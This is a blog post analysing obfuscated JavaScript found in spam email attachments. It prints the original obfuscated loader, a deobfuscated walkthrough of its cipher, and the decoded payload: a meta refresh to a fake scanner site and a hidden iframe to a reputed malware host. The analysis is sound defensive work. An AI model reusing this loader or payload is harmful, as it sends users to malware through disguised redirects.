Looking At Obfuscated Javascript Spam
The typical Gentoo developer tends to get a lot of email, and that usually means a lot of spam. Today, a massive amount of nasty spam messages arrived in my inbox, sadly they weren't caught by any spamassassins on the way to my inbox:
Subject: notes from last week
Date: Mon, 20 Sep 2010 10:57:09 -0600
Attached are notes from last week. Let me know if there are any errors or major omissions. Thanks.
[77476Officers Meeting.html text/html (649 bytes)]So I had 25 emails, all with a around 650 bytes of html attached, all escaping the spam filters. Okay, you caught my attention, stop sending emails already. Let's see:
<script language="JavaScript" type="text/javascript">function p2gd(wja8){var
jty7,lwpr="",uuar="qhliu-t\"x=; o/>.n0egc:pmsvafr<",ss0n,gpck,x4ab=uuar.length;eval(unescape("%66un%63ti%6Fn v%79dc%28cm%798){%6Cwp%72+=%63my8%7D"));for(jty7=0;jty7<wja8.length;jty7++){gpck=wja8.charAt(jty7);ss0n=uuar.indexOf(gpck);if(ss0n>-1){ss0n-=(jty7+1)%x4ab;if(ss0n<0){ss0n+=x4ab;}vydc(uuar.charAt(ss0n));}else{vydc(gpck);}}eval(unescape("%64oc%75me%6Et.w%72it%65(l%77pr)%3Blw%70r=%22%22;"));}p2gd("qv:;h0x>.lnq/ee av0xec eaixe n\"cg;>/se/x/:>c:xxhla=c e:.vhafuxuate/csqm-apq0m :fl-\"");</script><noscript>To display this page you need a browser that supports JavaScript.</noscript>
Oh, lots of obfuscated code. Especially interesting is the Javascript (with the blue background). After properly indenting and renaming the variables to something useful, you'll get this:
function func_1(param){
var i,
output="",
str1="qhliu-t\"x=; o/>.n0egc:pmsvafr<",
str1_position,
param_char,
str1_length=str1.length;
function add_to_output(str) { // was eval(unescape(...));
output += str;
}
for(i = 0; i < param.length; i++) {
param_char = param.charAt(i);
str1_position = str1.indexOf(param_char);
if(str1_position > -1) {
str1_position -= (i+1) % str1_length;
if (str1_position < 0) {
str1_position += str1_length;
}
add_to_output(str1.charAt(str1_position));
} else {
add_to_output(param_char);
}
}
document.write(output); // was eval(unescape(...));
output="";
}
func_1("qv:;h0x>.lnq/ee av0xec eaixe n\"cg;>/se/x/:>c:xxhla=c e:.vhafuxuate/csqm-apq0m :fl-\"");
What you can see is a function func_1 that is called with a string that looks like gibberish as parameter (line 32).
The function then iterates over every char in that string (line 14), does some magic to select a certain character from str1 or param,
and then adds it to the output variable (line 22 or 24).
Looking at that character selection algorithm, you can see that it first checks if the selected character from param is included in str1.
If that is the case, it'll pick one character from str1, following the calculation in line 18.
I'm not a crypto expert, but I think that snippet is similar to a Polyalphabetic cipher
like the Vigenère cipher. The modulo used in the calculation wraps the key (str1) so that it matches the length of param.
So it generates a string, and then writes it into the document, thus making the Browser parse it (line 61).
Cutting the long story short
That string it generates is sadly quite boring...
I used a website called jsunpack
to see the generated code, you might as well have replaced the document.write with alert(), but meh.
Here's the text:
PLEASE WAITING.... 4 SECONDS
<meta http-equiv="refresh" content="4;url=hXXp://scaner-high.cz.cc/scanner10/?afid=24" />
<iframe width="0" height="0" src="hXXp://finwizonline.com/news/"></iframe>
It renders an iframe that links to a PHP script which likely is a "how many people clicked this" counter and will redirect people to that website in four seconds to ensure they have been counted.
That /news/ website again redirects to another website which is no longer available. :(
At least a Google search suggests that this site hosts malicious content, Windows trojans specifically.
*yawn*
So, nothing to fear for us Linux people. It started being quite interesting, but besides an interesting obfuscation method, there were no fancy exploits to find.
I'll go setup a spamasassin rule to finally get rid of these messages now. sigh